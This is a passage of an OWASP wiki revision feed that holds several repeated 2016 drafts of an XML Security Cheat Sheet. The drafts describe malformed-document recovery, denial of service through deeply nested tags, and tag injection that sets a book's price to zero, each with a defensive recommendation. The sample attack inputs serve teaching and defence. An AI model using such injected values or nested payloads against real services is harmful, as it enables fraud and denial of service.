Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following three scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string -- (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your CDATA6 sections. This means that they will update the special characters contained in the CDATA section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a CDATA section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
If it is not possible to process only well-formed documents, take into consideration that the final results could be unreliable. To avoid this attack completely, you must not recover or process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up—and eventually deplete—the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplifies the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must define a maximum number of items (elements, attributes, entities, etc.) to be processed by the parser. If possible, use an XML schema to validate the document structure.&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must use an XML processor that follows W3C specifications. In addition, validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an id value related to an item and a certain price. The user may only introduce a certain id value using the web interface:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
&amp;lt;/buy&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an id, but now the document includes additional opening and closing tags. The attacker closes the id element and sets a bogus price element to the value 0. The final step to keep the structure well-formed is to add one opening id. After this, the application adds the closing tag for id and sets the price to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it. &lt;br /&gt;
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Each XML document must have a precisely defined XML schema with every piece of information properly restricted to avoid problems of improper data validation. &lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas don’t offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s age is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;11111..(1.000.000digits)..11111&amp;lt;/age&amp;gt;&lt;br /&gt;
&amp;lt;/person&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named person. This element contains two elements in a specific order: name and then age. The element name is then defined to contain PCDATA as well as the element age. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the age element contains one million digits. Since there are no restrictions on the maximum size for the age element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it isn’t possible to indicate specific restrictions (a maximum length for the element name or a valid range for the element age), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
Use a schema language capable of properly restricting information.&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224231</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224231"/>
				<updated>2016-12-19T20:50:00Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. This provides a complex scenario for developers, and a fun environment for hackers. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This talk will analyze how to infer new attack vectors by analyzing the current vulnerabilities, and how it is possible to affect common libraries and software. This cheatsheet will also provide recommendations for safe deployment of applications relying on XML.&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document shouldn’t undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs a malformed XML document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following three scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string -- (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your CDATA6 sections. This means that they will update the special characters contained in the CDATA section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a CDATA section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
If it is not possible to process only well-formed documents, take into consideration that the final results could be unreliable. To avoid this attack completely, you must not recover or process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up—and eventually deplete—the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplifies the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must define a maximum number of items (elements, attributes, entities, etc.) to be processed by the parser. If possible, use an XML schema to validate the document structure.&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack you must use an XML processor that follows W3C specifications. In addition, validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224178</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224178"/>
				<updated>2016-12-15T10:45:46Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: /* Malformed Document to Malformed Document Containing Unexpected Characters */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. This provides a complex scenario for developers, and a fun environment for hackers. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This talk will analyze how to infer new attack vectors by analyzing the current vulnerabilities, and how it is possible to affect common libraries and software. This cheatsheet will also provide recommendations for safe deployment of applications relying on XML.&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document shouldn’t undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
Apache Xerces-J XML may serve as an example for this type of vulnerability; in this case, malformed data caused the XML parser &amp;quot;&amp;lt;i&amp;gt;...to consume CPU resource for several minutes before the data [was] eventually rejected. This behavior can be used to launch a denial of service attack against any Java server application, which processes XML data supplied by remote users.&amp;lt;/i&amp;gt;&amp;quot;. An attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following three scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string -- (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your CDATA6 sections. This means that they will update the special characters contained in the CDATA section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a CDATA section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224165</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224165"/>
				<updated>2016-12-15T00:04:48Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. This provides a complex scenario for developers, and a fun environment for hackers. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This talk will analyze how to infer new attack vectors by analyzing the current vulnerabilities, and how it is possible to affect common libraries and software. This cheatsheet will also provide recommendations for safe deployment of applications relying on XML.&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document shouldn’t undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
Apache Xerces-J XML may serve as an example for this type of vulnerability; in this case, malformed data caused the XML parser &amp;quot;&amp;lt;i&amp;gt;...to consume CPU resource for several minutes before the data [was] eventually rejected. This behavior can be used to launch a denial of service attack against any Java server application, which processes XML data supplied by remote users.&amp;lt;/i&amp;gt;&amp;quot;. An attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following three scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document Containing Unexpected Characters ===&lt;br /&gt;
According to the XML specification, the string -- (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your CDATA6 sections. This means that they will update the special characters contained in the CDATA section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a CDATA section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224159</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224159"/>
				<updated>2016-12-14T19:34:10Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. This provides a complex scenario for developers, and a fun environment for hackers. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This talk will analyze how to infer new attack vectors by analyzing the current vulnerabilities, and how it is possible to affect common libraries and software. This cheatsheet will also provide recommendations for safe deployment of applications relying on XML.&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document shouldn’t undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
Apache Xerces-J XML may serve as an example for this type of vulnerability; in this case, malformed data caused the XML parser &amp;quot;&amp;lt;i&amp;gt;...to consume CPU resource for several minutes before the data [was] eventually rejected. This behavior can be used to launch a denial of service attack against any Java server application, which processes XML data supplied by remote users.&amp;lt;/i&amp;gt;&amp;quot;. An attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
&lt;br /&gt;
To avoid this attack, you must confirm that your version of the XML processor does not take additional time to process malformed documents.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following three scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document Containing Unexpected Characters ===&lt;br /&gt;
According to the XML specification, the string -- (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document using Normalization ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your CDATA6 sections. This means that they will update the special characters contained in the CDATA section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a CDATA section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt; &lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Well-Formed Document Including Content Modification ===&lt;br /&gt;
The contents of certain malformed documents could be altered after being recovered. Consider the scenario where a book is on sale unless the value of its &amp;quot;onsale&amp;quot; element is no:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;book&amp;gt;&lt;br /&gt;
  &amp;lt;item&amp;gt;ABC101&amp;lt;/item&amp;gt;&lt;br /&gt;
  &amp;lt;value&amp;gt;10&amp;lt;/value&amp;gt;&lt;br /&gt;
  &amp;lt;onsale&amp;amp;&amp;gt;no&amp;lt;/onsale&amp;gt;&lt;br /&gt;
  &amp;lt;onsalevalue&amp;gt;5&amp;lt;/onsalevalue&amp;gt;&lt;br /&gt;
&amp;lt;/book&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous onsale element contains the &amp;amp; character, which is not supposed to be there. The resulting value of that element may be different after document recovery:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;book&amp;gt;&lt;br /&gt;
  &amp;lt;item&amp;gt;ABC101&amp;lt;/item&amp;gt;&lt;br /&gt;
  &amp;lt;value&amp;gt;10&amp;lt;/value&amp;gt;&lt;br /&gt;
  &amp;lt;onsale/&amp;gt;&lt;br /&gt;
  &amp;amp;amp;gt;no&lt;br /&gt;
  &amp;lt;onsalevalue&amp;gt;5&amp;lt;/onsalevalue&amp;gt;&lt;br /&gt;
&amp;lt;/book&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224123</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224123"/>
				<updated>2016-12-13T22:49:45Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
